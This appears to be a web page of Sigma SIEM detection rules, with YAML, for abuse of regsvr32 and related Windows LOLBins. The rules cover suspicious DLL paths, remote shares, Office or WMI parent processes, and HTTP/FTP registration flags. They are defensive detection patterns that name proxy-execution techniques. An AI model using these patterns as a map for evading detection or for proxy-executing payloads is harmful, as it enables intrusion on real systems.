Sigma is the open generic signature format for SIEM systems. Each rule below converts to native syntax for Splunk, Elastic, Sentinel, and other SIEMs. Expand any rule to see its raw YAML.
Regsvr32 Execution From Highly Suspicious Location
Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
status testauthor Nasreddine Bencherchali (Nextron Systems)id 327ff235-94eb-4f06-b9de-aaee571324be
view Sigma YAML
title: Regsvr32 Execution From Highly Suspicious Location
id: 327ff235-94eb-4f06-b9de-aaee571324be
status: test
description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\regsvr32.exe'
- OriginalFileName: 'REGSVR32.EXE'
selection_path_1:
CommandLine|contains:
- ':\PerfLogs\'
- ':\Temp\'
- '\Windows\Registration\CRMLog'
- '\Windows\System32\com\dmp\'
- '\Windows\System32\FxsTmp\'
- '\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\'
- '\Windows\System32\spool\drivers\color\'
- '\Windows\System32\spool\PRINTERS\'
- '\Windows\System32\spool\SERVERS\'
- '\Windows\System32\Tasks_Migrated\'
- '\Windows\System32\Tasks\Microsoft\Windows\SyncCenter\'
- '\Windows\SysWOW64\com\dmp\'
- '\Windows\SysWOW64\FxsTmp\'
- '\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\'
- '\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter\'
- '\Windows\Tasks\'
- '\Windows\Tracing\'
selection_path_2:
CommandLine|contains:
# This is to avoid collisions with CLI starting with "C:\"
- ' "C:\'
- ' C:\'
- " 'C:\\"
- 'D:\'
selection_exclude_known_dirs:
CommandLine|contains:
# Note: add additional locations that are related to third party applications
- 'C:\Program Files (x86)\'
- 'C:\Program Files\'
- 'C:\ProgramData\'
- 'C:\Users\'
# Note: The space added here are to avoid collisions with the "regsvr32" binary full path
- ' C:\Windows\'
- ' "C:\Windows\'
- " 'C:\\Windows\\"
filter_main_empty:
CommandLine: ''
filter_main_null:
CommandLine: null
condition: selection_img and (selection_path_1 or (selection_path_2 and not selection_exclude_known_dirs)) and not 1 of filter_main_*
falsepositives:
- Unlikely
level: high
high
Suspicious HH.EXE Execution
Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
status testauthor Maxim Pavluninid e8a95b5e-c891-46e2-b33a-93937d3abc31
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
status testauthor Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_ioid 438025f9-5856-4663-83f7-52f878a70a50
Detects REGSVR32.exe to execute DLL hosted on remote shares
status testauthor Nasreddine Bencherchali (Nextron Systems)id 88a87a10-384b-4ad7-8871-2f9bf9259ce5
view Sigma YAML
title: Suspicious Regsvr32 Execution From Remote Share
id: 88a87a10-384b-4ad7-8871-2f9bf9259ce5
status: test
description: Detects REGSVR32.exe to execute DLL hosted on remote shares
references:
- https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-31
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\regsvr32.exe'
- OriginalFileName: '\REGSVR32.EXE'
selection_cli:
CommandLine|contains: ' \\\\'
condition: all of selection_*
falsepositives:
- Unknown
# Decrease to medium if this is something common in your org
level: high
high
Suspicious WMIC Execution Via Office Process
Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
status testauthor Vadim Khrykov, Cyb3rEngid e1693bc8-7168-4eab-8718-cdcaa68a1738
view Sigma YAML
title: Suspicious WMIC Execution Via Office Process
id: e1693bc8-7168-4eab-8718-cdcaa68a1738
related:
- id: 438025f9-5856-4663-83f7-52f878a70a50
type: derived
- id: 518643ba-7d9c-4fa5-9f37-baed36059f6a
type: obsolete
- id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0
type: obsolete
- id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5
type: obsolete
- id: 04f5363a-6bca-42ff-be70-0d28bf629ead
type: obsolete
status: test
description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
author: Vadim Khrykov, Cyb3rEng
date: 2021-08-23
modified: 2023-02-14
tags:
- attack.stealth
- attack.t1204.002
- attack.t1047
- attack.t1218.010
- attack.execution
logsource:
product: windows
category: process_creation
detection:
selection_parent:
ParentImage|endswith:
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\POWERPNT.exe'
- '\MSPUB.exe'
- '\VISIO.exe'
- '\MSACCESS.EXE'
- '\EQNEDT32.EXE'
- '\ONENOTE.EXE'
- '\wordpad.exe'
- '\wordview.exe'
selection_wmic_img:
- Image|endswith: '\wbem\WMIC.exe'
- OriginalFileName: 'wmic.exe'
selection_wmic_cli:
CommandLine|contains|all:
- 'process'
- 'create'
- 'call'
CommandLine|contains:
# Add more suspicious LOLBINs as you see fit
- 'regsvr32'
- 'rundll32'
- 'msiexec'
- 'mshta'
- 'verclsid'
- 'wscript'
- 'cscript'
condition: all of selection_*
falsepositives:
- Unknown
level: high
high
Suspicious WmiPrvSE Child Process
Detects suspicious and uncommon child processes of WmiPrvSE
title: Suspicious WmiPrvSE Child Process
id: 8a582fe2-0882-4b89-a82a-da6b2dc32937
related:
- id: 692f0bec-83ba-4d04-af7e-e884a96059b6
type: similar
- id: d21374ff-f574-44a7-9998-4a8c8bf33d7d
type: similar
- id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
type: obsolete
status: test
description: Detects suspicious and uncommon child processes of WmiPrvSE
references:
- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/
- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
- https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/
- https://twitter.com/ForensicITGuy/status/1334734244120309760
author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
date: 2021-08-23
modified: 2023-11-10
tags:
- attack.execution
- attack.stealth
- attack.t1047
- attack.t1204.002
- attack.t1218.010
logsource:
product: windows
category: process_creation
detection:
selection_parent:
ParentImage|endswith: '\wbem\WmiPrvSE.exe'
selection_children_1:
# TODO: Add more LOLBINs or suspicious processes that make sens in your environment
Image|endswith:
- '\certutil.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\msiexec.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\verclsid.exe'
- '\wscript.exe'
selection_children_2:
# This is in a separate selection due to the nature of FP generated with CMD
Image|endswith: '\cmd.exe'
CommandLine|contains:
- 'cscript'
- 'mshta'
- 'powershell'
- 'pwsh'
- 'regsvr32'
- 'rundll32'
- 'wscript'
filter_main_werfault:
Image|endswith: '\WerFault.exe'
filter_main_wmiprvse:
Image|endswith: '\WmiPrvSE.exe' # In some legitimate case WmiPrvSE was seen spawning itself
filter_main_msiexec:
Image|endswith: '\msiexec.exe'
CommandLine|contains: '/i '
condition: selection_parent and 1 of selection_children_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
medium
DNS Query Request By Regsvr32.EXE
Detects DNS queries initiated by "Regsvr32.exe"
status testauthor Dmitriy Lifanov, oscd.communityid 36e037c4-c228-4866-b6a3-48eb292b9955
view Sigma YAML
title: DNS Query Request By Regsvr32.EXE
id: 36e037c4-c228-4866-b6a3-48eb292b9955
related:
- id: c7e91a02-d771-4a6d-a700-42587e0b1095
type: derived
status: test
description: Detects DNS queries initiated by "Regsvr32.exe"
references:
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
- attack.execution
- attack.stealth
- attack.t1559.001
- attack.t1218.010
logsource:
category: dns_query
product: windows
detection:
selection:
Image|endswith: '\regsvr32.exe'
condition: selection
falsepositives:
- Unknown
level: medium
medium
Network Connection Initiated By Regsvr32.EXE
Detects a network connection initiated by "Regsvr32.exe"
status testauthor Dmitriy Lifanov, oscd.communityid c7e91a02-d771-4a6d-a700-42587e0b1095
view Sigma YAML
title: Network Connection Initiated By Regsvr32.EXE
id: c7e91a02-d771-4a6d-a700-42587e0b1095
status: test
description: Detects a network connection initiated by "Regsvr32.exe"
references:
- https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
author: Dmitriy Lifanov, oscd.community
date: 2019-10-25
modified: 2023-09-18
tags:
- attack.execution
- attack.stealth
- attack.t1559.001
- attack.t1218.010
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\regsvr32.exe'
condition: selection
falsepositives:
- Unknown
level: medium
medium
Potential Regsvr32 Commandline Flag Anomaly
Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
status testauthor Florian Roth (Nextron Systems)id b236190c-1c61-41e9-84b3-3fe03f6d76b0
view Sigma YAML
title: Potential Regsvr32 Commandline Flag Anomaly
id: b236190c-1c61-41e9-84b3-3fe03f6d76b0
status: test
description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon.
references:
- https://twitter.com/sbousseaden/status/1282441816986484737?s=12
author: Florian Roth (Nextron Systems)
date: 2019-07-13
modified: 2024-03-13
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|windash: ' -i:'
filter_main_flag:
CommandLine|contains|windash: ' -n '
condition: selection and not 1 of filter_main_*
falsepositives:
- Administrator typo might cause some false positives
level: medium
medium
Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
status testauthor Florian Roth (Nextron Systems)id 867356ee-9352-41c9-a8f2-1be690d78216
view Sigma YAML
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
- id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
type: obsolete
status: test
description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
- https://twitter.com/tccontre18/status/1480950986650832903
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2023-05-24
modified: 2023-05-26
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\regsvr32.exe'
- OriginalFileName: 'REGSVR32.EXE'
selection_flag:
CommandLine|contains:
- ' /i'
- ' -i'
selection_protocol:
CommandLine|contains:
- 'ftp'
- 'http'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
medium
Regsvr32 Execution From Potential Suspicious Location
Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
title: Scripting/CommandLine Process Spawned Regsvr32
id: ab37a6ec-6068-432b-a64e-2c7bf95b1d22
related:
- id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
type: obsolete
status: test
description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
references:
- https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
- https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
Image|endswith: '\regsvr32.exe'
filter_main_rpcproxy:
ParentImage: C:\Windows\System32\cmd.exe
CommandLine|endswith: ' /s C:\Windows\System32\RpcProxy\RpcProxy.dll'
condition: selection and not 1 of filter_main_*
falsepositives:
- Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary
- Some legitimate Windows services
level: medium # Can be reduced to low if you experience a ton of FP
medium
Unsigned DLL Loaded by Windows Utility
Detects windows utilities loading an unsigned or untrusted DLL.
Adversaries often abuse those programs to proxy execution of malicious code.
status testauthor Swachchhanda Shrawan Poudelid b5de0c9a-6f19-43e0-af4e-55ad01f550af
view Sigma YAML
title: Unsigned DLL Loaded by Windows Utility
id: b5de0c9a-6f19-43e0-af4e-55ad01f550af
status: test
description: |
Detects windows utilities loading an unsigned or untrusted DLL.
Adversaries often abuse those programs to proxy execution of malicious code.
references:
- https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion
- https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql
- https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true
author: Swachchhanda Shrawan Poudel
date: 2024-02-28
modified: 2025-10-07
tags:
- attack.stealth
- attack.t1218.011
- attack.t1218.010
logsource:
product: windows
category: image_load
detection:
selection:
Image|endswith:
# Note: Add additional utilities that allow the loading of DLLs
- '\InstallUtil.exe'
- '\RegAsm.exe'
- '\RegSvcs.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
filter_main_signed:
Signed: 'true'
filter_main_sig_status:
SignatureStatus:
- 'errorChaining'
- 'errorCode_endpoint'
- 'errorExpired'
- 'trusted'
- 'Valid'
filter_main_signed_null:
Signed: null
filter_main_signed_empty:
Signed:
- ''
- '-'
filter_main_sig_status_null:
SignatureStatus: null
filter_main_sig_status_empty:
SignatureStatus:
- ''
- '-'
filter_main_windows_installer:
Image:
- 'C:\Windows\SysWOW64\rundll32.exe'
- 'C:\Windows\System32\rundll32.exe'
ImageLoaded|startswith: 'C:\Windows\Installer\'
ImageLoaded|endswith:
- '.tmp-\Microsoft.Deployment.WindowsInstaller.dll'
- '.tmp-\Avira.OE.Setup.CustomActions.dll'
filter_main_assembly:
Image|startswith:
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\System32\'
- 'C:\Windows\Microsoft.NET\Framework64'
Image|endswith: '\RegAsm.exe'
ImageLoaded|endswith: '.dll'
ImageLoaded|startswith: 'C:\Windows\assembly\NativeImages'
filter_optional_klite_codec:
Image:
- 'C:\Windows\SysWOW64\regsvr32.exe'
- 'C:\Windows\System32\regsvr32.exe'
ImageLoaded|startswith:
- 'C:\Program Files (x86)\K-Lite Codec Pack\'
- 'C:\Program Files\K-Lite Codec Pack\'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium